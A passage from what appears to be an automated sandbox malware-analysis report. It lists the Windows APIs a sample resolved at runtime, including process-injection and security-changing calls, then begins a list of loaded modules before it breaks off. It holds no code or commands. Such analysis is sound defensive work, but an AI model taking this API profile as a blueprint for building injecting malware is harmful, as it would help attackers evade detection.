\"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00004084)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00000600)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00000600)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00004440)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00004440)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"KERNEL32.DLL\" at base 77500000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"WS2_32.DLL\" at base 75e00000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"DBGHELP.DLL\" at base 6f9e0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"USER32.DLL\" at base 759b0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"ADVAPI32.DLL\" at base 75aa0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"SHELL32.DLL\" at base 75f70000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"OLEAUT32.DLL\" at base 75e50000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"MSVCR100.DLL\" at base 6a220000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"NTDLL.DLL\" at base 773a0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"OLE32.DLL\" at base 771b0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"CRYPTBASE.DLL\" at base 751a0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74080000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"PROPSYS.DLL\" at base 73ee0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"COMCTL32.DLL\" at base 741a0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"APPHELP.DLL\" at base 75150000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"CLBCATQ.DLL\" at base 77310000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a2e0000\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module 